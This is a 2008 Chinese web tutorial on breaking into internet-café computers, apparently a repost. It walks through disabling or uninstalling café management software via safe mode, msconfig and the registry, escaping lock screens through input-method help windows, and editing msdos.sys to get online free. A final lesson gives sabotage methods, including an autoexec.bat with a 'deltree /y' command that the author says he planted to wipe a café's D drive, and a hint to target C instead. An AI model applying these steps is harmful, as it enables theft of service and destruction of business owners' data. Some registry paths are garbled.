菜鳥的網(wǎng)吧常見漏洞入侵
互聯(lián)網(wǎng) 發(fā)布時(shí)間:2008-10-08 19:37:21 作者:佚名
我要評論
第一課 首先試試“安全模式”漏洞。
到網(wǎng)吧后開機(jī)(不要管理員解鎖),一會兒屏幕出現(xiàn)“Starting Windows ……”時(shí),按下"F5"鍵啟動到“安全模式”,在“開始”→“運(yùn)行”框
第一課 首先試試“安全模式”漏洞。
到網(wǎng)吧后開機(jī)(不要管理員解鎖),一會兒屏幕出現(xiàn)“Starting Windows ……”時(shí),按下"F5"鍵啟動到“安全模式”,在“開始”→“運(yùn)行”框中輸入“msconfig”(回車),打開“系統(tǒng)配置實(shí)用程序”,用鼠標(biāo)單擊“啟動”標(biāo)簽,去掉所有與網(wǎng)管軟件有關(guān)的項(xiàng),也可以在運(yùn)行框中輸入“regedit”打開注冊表,刪除注冊表“HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun”下的相關(guān)鍵值,更殘忍的干脆把網(wǎng)管軟件給卸載掉,重新啟動計(jì)算機(jī)后,就可以免費(fèi)上網(wǎng)了。是不是很簡單?不過可要當(dāng)心網(wǎng)吧老板!如果“F5”鍵被屏蔽了,則應(yīng)該先修改“msdos.sys”??纯聪旅娴?ldquo;輸入法”漏洞,大家就知道怎么修改了。
第二課(本課以“網(wǎng)吧管理專家”為例)
照樣先開機(jī)(啟動過程別按“F5”),沒有讓管理員解鎖的計(jì)算機(jī)在桌面上有一密碼框,是用于驗(yàn)證用戶身份的。這里分為會員和管理員,兩種身份分別具有不同的使用權(quán)限。我不是管理員,所以我不知道管理員密碼,在座有哪位知道的?(你不用拼命搖頭啦?。]有密碼照樣能進(jìn)入!我們可以繞到密碼框后面去。用鼠標(biāo)單擊“會員卡號”框,利用“ctrl shift”或“Ctrl Space(空格鍵)”調(diào)出輸入法,然后隨意輸入一個(gè)字母,在彈出的輸入框上單擊鼠標(biāo)右鍵,看看有沒有“幫助”。沒有的話就用“Ctrl Shift”切換輸入法,直到找出“幫助”后單擊它。鼠標(biāo)的移動范圍被限制了,可以這樣破解它:按下“Alt Space”,在彈出的標(biāo)題欄菜單上(用鍵盤)選擇“移動”,再回車兩下就OK了。基礎(chǔ)打好了,現(xiàn)在讓我們看看這個(gè)網(wǎng)吧里有什么好東東,用鼠標(biāo)單擊“幫助”的標(biāo)題欄圖標(biāo)(有一種幫助沒有這個(gè)圖標(biāo),這種幫助好像沒什么利用價(jià)值)。打開控制菜單后,再單擊“跳至 URL(J) ...”,在彈出的輸入框中輸入網(wǎng)址或盤符都可以,先去C盤看看,輸入“C:”或“file:///C:/”。我找…… 似乎沒什么好玩的。你看那網(wǎng)管軟件,就放在這么顯眼的地方,也不怕被人執(zhí)行“Uninstall.exe”。…… 下面就開始上網(wǎng)了。:)去“新浪”逛逛,打開“跳至 URL(J)...”框,輸入“www.sina.com.cn”(“回車”),大家讓一讓,發(fā)生什么事了?網(wǎng)頁內(nèi)容竟然在“幫助”里顯示出來了!如果要去雅虎網(wǎng)站,還得再單擊“跳至 URL(J) ...”,麻煩了點(diǎn),不如去桌面上找個(gè)IE更方便些,這次還是得單擊“跳至 URL(J)...”,輸入“c:windowsdesktop”(回車),或者在剛才打開的c盤上任意選擇一個(gè)文件夾,按“shift Enter(回車)”,調(diào)出資源管理器,也可以到達(dá)桌面。
有些人想要管理員密碼,你可以自已來設(shè)置一個(gè),我慣用的方法是:打開注冊表,刪除“[Hkey_Local_MachineSoftware萬象幻境專家系列管理軟件]”下的鍵名“計(jì)算機(jī)解鎖密碼”和“運(yùn)行設(shè)置程序密碼”的鍵值(另外還有其他的密碼,均已被編譯,要?jiǎng)h除就隨你便啦?。└耐旰笸顺鲎员聿⒅匦聠佑?jì)算機(jī),密碼框不見了,然后依次單擊“開始→設(shè)置→運(yùn)行設(shè)置程序”,倘若你覺得該網(wǎng)吧限制太高,不妨把它設(shè)置低一點(diǎn)。如果注冊表編輯器被禁止,就當(dāng)我上面的話沒說,我們可以用這種方法破解:
1.在IE地址欄內(nèi)輸入“c:”,回車。
2.單擊“文件”菜單,新建一份文本文檔,輸入如下代碼:
以下是代碼片段:
Regedit4
[HKEY_USERS.DEFAULTSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem]
"DisableRegistryTools"=dword:01000000
將文件另存為“1.reg”,把它雙擊安裝后就可以使用注冊表編輯器了。剛才提到怎樣解除“F5”的限制,利用“幫助”漏洞來解除可以,但是我想利用“快速提示”漏洞。
第三課 “輸入法”中的“快速提示”漏洞
這節(jié)課教大家什么?嗯!是“輸入法”中的“快速提示”漏洞,目前僅有“五筆加加”輸入法有這個(gè)漏洞。照上節(jié)課教的,不過這次要大家找的是“快速提示”,而不是“幫助”,切換輸入法,找到“快速提示”后單擊它,這時(shí)出現(xiàn)一個(gè)IE窗口(不是太菜的你應(yīng)該知道干什么用的,上網(wǎng)用的唄?。?,鼠標(biāo)移動范圍被限制了,破解它(上節(jié)課教過了,但是如果IE窗口是最大化的,則應(yīng)該先在控制菜單中選擇“恢復(fù)為小窗口”后再“移動”,再按“回車”),這樣便可免費(fèi)上網(wǎng)了,需要打開桌面,最簡單的方法是:在IE地址欄上輸入“桌面”(回車)?;仡櫼幌碌谝还?jié)課主要說了什么……嗯!利用“F5”漏洞免費(fèi)上網(wǎng),大多被屏蔽掉了,第二節(jié)課說過要利用“快速提示”漏洞來解除它。怎么做呢?(大家筆拿起來做些筆記),“msdos.sys”文件在C盤根目錄下一般是以“隱藏”和“只讀”形式儲存的,我們需要先去掉它的“只讀”屬性,要不然無法對它做任何修改,在IE地址欄上輸入“file:///C:/command.com”回車,打開“ms-dos方式”,在提示符下輸入 “attrib -r c:msdos.sys”(回車)以去掉“只讀”屬性,再返回到IE地址欄上輸入“file:///C:/msdos.sys”(回車),把“打開方式”設(shè)為“記事本”,把“option”下的“BootKeys”的值改為“1”,保存退出。重新啟動計(jì)算機(jī)便可使修改生效。
上面講的都是以“網(wǎng)吧管理專家”網(wǎng)管軟件為例,如果是“美萍”控制的計(jì)算機(jī),得先打開“開始→會員登陸”,接下來與“網(wǎng)吧管理專家”操作過程相同。再補(bǔ)充一點(diǎn),其實(shí)免費(fèi)上網(wǎng)還有一種方法,不過成功率不高,就是使網(wǎng)管軟件出錯(cuò),我是用鍵盤上的“Ctrl、Shift、Alt”三個(gè)鍵中任一鍵或任兩鍵配合其他鍵狂按,結(jié)果網(wǎng)管軟件報(bào)錯(cuò)退出,“我的電腦”和“回收站”等都出現(xiàn)在桌面上了。
第四課 一些破壞網(wǎng)吧數(shù)據(jù)的方法(那位耳朵伸得那么長,想必是網(wǎng)德不善者)。
破壞1(破壞級別:中):
在IE“地址欄”或“jump to URL”中輸入“file:///c:/windows/control.exe”,打開“控制面板→ 添加/刪除程序”,卸載掉你“感興趣”的應(yīng)用程序。
破壞2(破壞級別:中→高):
為了防止文件被刪除,網(wǎng)管軟件一般都屏蔽了鼠標(biāo)右鍵,并且連鍵盤上的“Delete”和“Shift Delete”也無效,不過據(jù)我所知,在“網(wǎng)吧管理專家”控制下的數(shù)據(jù)可以用“Ctrl D”來刪除。 so.bitsCN.com網(wǎng)管資料庫任你搜
破壞3(破壞級別:高):
修改C盤根目錄下的“autoexec.bat”文件為如下代碼:
以下是代碼片段:
@echo off
path=c:windows;c:windowscommand
smartdrv >nul
deltree /y D:. >nul
這些代碼是我前段時(shí)間在某網(wǎng)吧里預(yù)留的,后果只是使硬盤D分區(qū)的數(shù)據(jù)全部丟失而已,但計(jì)算機(jī)仍可啟動(因?yàn)椴僮飨到y(tǒng)被裝在C盤),若將第四段代碼的“D:”改為“C:”,有什么后果?你試試就知道了,像我這樣心地善良,樂于助人的人,是不會那么做的。
相關(guān)文章

什么是CC攻擊 判斷網(wǎng)站是否被CC攻擊并且如何防御CC攻擊
CC主要是用來攻擊頁面的,大家都有這樣的經(jīng)歷,就是在訪問論壇時(shí),如果這個(gè)論壇比較大,訪問的人比較多,打開頁面的速度會比較慢,對不?!一般來說,訪問的人越多,論壇的頁2024-01-06
Windows系統(tǒng)安全風(fēng)險(xiǎn)-本地NTLM重放提權(quán)
入侵者主要通過Potato程序攻擊擁有SYSTEM權(quán)限的端口偽造網(wǎng)絡(luò)身份認(rèn)證過程,利用NTLM重放機(jī)制騙取SYSTEM身份令牌,最終取得系統(tǒng)權(quán)限,該安全風(fēng)險(xiǎn)微軟并不認(rèn)為存在漏洞,所以2021-04-15
這篇文章主要介紹了文件上傳漏洞全面滲透分析小結(jié),這里主要為大家分享一下防御方法,需要的朋友可以參考下2021-03-21- 這篇文章主要介紹了sql手工注入語句&SQL手工注入大全,需要的朋友可以參考下2017-09-06
- 這篇文章主要介紹了詳解Filezilla server 提權(quán),需要的朋友可以參考下2017-05-13
FileZilla Server 2008 x64 提權(quán)與防御方法
這篇文章主要介紹了FileZilla Server 2008 x64 提權(quán)與防御方法,需要的朋友可以參考下2017-05-13https加密也被破解 HEIST攻擊從加密數(shù)據(jù)獲取明文
不久之前我們說過關(guān)于http和https的區(qū)別,對于加密的https,我們一直認(rèn)為它是相對安全的,可今天要講的是,一種繞過HTTPS加密得到明文信息的web攻擊方式,不知道這消息對你2016-08-10iPhone和Mac也會被黑 一條iMessage密碼可能就被盜了
一直以來蘋果系統(tǒng)的安全性都是比安卓要高的,但是再安全的系統(tǒng)也免不了漏洞,蘋果也一樣。最近爆出的新漏洞,只需要接收一條多媒體信息或者iMessage就會導(dǎo)致用戶信息泄露。2016-07-27- 國家正在修正關(guān)于黑客方面的法律法規(guī),有一條震驚黑客圈的“世紀(jì)佳緣”起訴白帽黑客事件,深深的傷害了廣大黑客們的心,加上扎克伯格和特拉維斯·卡蘭尼克賬號被盜,于是黑2016-07-11
如何逆向破解HawkEye keylogger鍵盤記錄器進(jìn)入攻擊者郵箱
面對惡意郵件攻擊,我們就只能默默忍受被他攻擊,連自我保護(hù)能力都沒有談什么反抗?讓人痛快的是,如今有了解決辦法,逆向破解鍵盤記錄器,進(jìn)入攻擊者郵箱2016-07-06


